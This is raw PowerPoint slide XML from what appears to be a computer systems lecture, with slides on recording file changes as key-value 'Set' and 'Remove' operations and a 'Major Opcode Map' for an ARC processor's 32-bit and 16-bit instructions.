            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>They record the changes in the files</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="395042130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0496"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70" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2916238" y="6165850"/>
            <a:ext cx="439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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1028" name="Rectangle 25"/>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1279DC44-2792-47E8-8B14-BAA05C06667D}" type="slidenum">
              <a:rPr lang="en-US" sz="1400"/>
              <a:pPr algn="ctr"/>
              <a:t>314</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2804278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70"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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0"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1520"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3" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2916238" y="6165850"/>
            <a:ext cx="4246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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35854" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="29162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“D” = “!@#$”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2053" name="Rectangle 15"/>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C521EBA2-D6E1-4083-A692-B9264A5D2FF4}" type="slidenum">
              <a:rPr lang="en-US" sz="1400"/>
              <a:pPr algn="ctr"/>
              <a:t>315</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21685511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5853"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="35853"/>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5854"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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3" grpId="0"/>
      <p:bldP spid="35854"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2544"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38916" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="29162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“D” = “!@#$”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38917" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2916238" y="6165850"/>
            <a:ext cx="4551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“123456”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3077" name="Rectangle 7"/>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4BDAF37F-9130-4095-A76C-D715299683F4}" type="slidenum">
              <a:rPr lang="en-US" sz="1400"/>
              <a:pPr algn="ctr"/>
              <a:t>316</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4181352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8916"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="38916"/>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8917"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="10"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3568"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4099" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2700338" y="6092825"/>
            <a:ext cx="352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endParaRPr lang="en-US" sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39942" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2914650" y="6164263"/>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“123456”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39943" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3276600" y="6164263"/>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Remove “ABC”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4102" name="Rectangle 9"/>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84F8846E-9240-41BA-AB01-F1334A14E55C}" type="slidenum">
              <a:rPr lang="en-US" sz="1400"/>
              <a:pPr algn="ctr"/>
              <a:t>317</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2691085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9942"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="39942"/>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9943"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="10"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4592"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5123" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3271838" y="6161088"/>
            <a:ext cx="2519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Remove “ABC”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5124"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DCC984DD-394D-482E-BDC3-E80BA0D8C8D3}" type="slidenum">
              <a:rPr lang="en-US" sz="1400"/>
              <a:pPr algn="ctr"/>
              <a:t>318</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="883580709"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="med">
    <p:fad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5616"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41990" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1763713" y="3357563"/>
            <a:ext cx="561657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b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Set “filename0”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Set “D” = “$#@!”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Set “D” = “%^&amp;*”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Set “myfile” = “0000”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Set “myfile” = “0001”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Set “YZ” = “9”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41991" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2484438" y="6237288"/>
            <a:ext cx="5287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6149" name="Rectangle 9"/>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5CF6B19E-536C-4BB1-89C7-DC4AD68BFF96}" type="slidenum">
              <a:rPr lang="en-US" sz="1400"/>
              <a:pPr algn="ctr"/>
              <a:t>319</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="715917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blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="41991"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="8" presetID="3" presetClass="exit" presetSubtype="10" fill="hold" grpId="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="41990"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="419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087688" y="1944688"/>
            <a:ext cx="5211762" cy="3468687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCCCC"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Century Gothic" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1390650" y="1944688"/>
            <a:ext cx="1697038" cy="3468687"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF99"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Century Gothic" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316422" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>Major Opcode Map</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16389" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="1941513"/>
            <a:ext cx="6908800" cy="3468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390" name="Line 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4845050" y="1938338"/>
            <a:ext cx="0" cy="3454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7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1390650" y="3233738"/>
            <a:ext cx="6910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8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6584950" y="1952625"/>
            <a:ext cx="0" cy="3454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9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1400175" y="454183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10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1390650" y="2797175"/>
            <a:ext cx="6910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5" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1406525" y="2349500"/>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Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1401763" y="367823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13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1408113" y="4987925"/>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Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="696913" y="191293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000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16399" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="696913" y="27781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010</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16400" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="696913" y="32226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011</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16401" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="696913" y="36512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100</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16402" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="696913" y="40957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101</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16403" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="696913" y="451643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110</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16404" name="Text Box 20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="696913" y="23209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001</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16405" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="1011238" y="5403850"/>
            <a:ext cx="142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6" name="Line 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1397000" y="411638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7" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="696913" y="49625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111</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16408" name="Text Box 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1978025"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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16409" name="Text Box 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3746500"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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16410" name="Text Box 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5457825"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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16411" name="Text Box 27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7245350"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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16412" name="AutoShape 28"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5381617">
            <a:off x="2124869" y="4753769"/>
            <a:ext cx="215900" cy="1662112"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 847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413" name="AutoShape 29"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5381617">
            <a:off x="5607050" y="2997200"/>
            <a:ext cx="220663" cy="5173663"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 2582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414" name="Text Box 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1385888" y="5630863"/>
            <a:ext cx="1693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latin typeface="Times"/>
              </a:rPr>
              <a:t>32-bit instructions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16415" name="Text Box 31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4878388" y="5630863"/>
            <a:ext cx="1674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latin typeface="Times"/>
              </a:rPr>
              <a:t>16-bit instructions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16416" name="Text Box 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1863725" y="2011363"/>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17" name="Text Box 33"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1385888" y="2354263"/>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 Link and Branch/Compare</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16418" name="Text Box 34"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1962150" y="2892425"/>
            <a:ext cx="554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19" name="Text Box 35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1958975" y="3335338"/>
            <a:ext cx="565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20" name="Text Box 36"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1676400" y="3773488"/>
            <a:ext cx="11287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ARC BaseCase</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16421" name="Text Box 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1347788" y="4205288"/>
            <a:ext cx="17859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2" name="Text Box 38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1347788" y="4635500"/>
            <a:ext cx="17859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3" name="Text Box 39"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1600200" y="5056188"/>
            <a:ext cx="1281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FF3300"/>
                </a:solidFill>
                <a:latin typeface="Times"/>
              </a:rPr>
              <a:t>USER Extensions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16424" name="Text Box 40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3079750" y="2011363"/>
            <a:ext cx="17859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5" name="Text Box 41"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
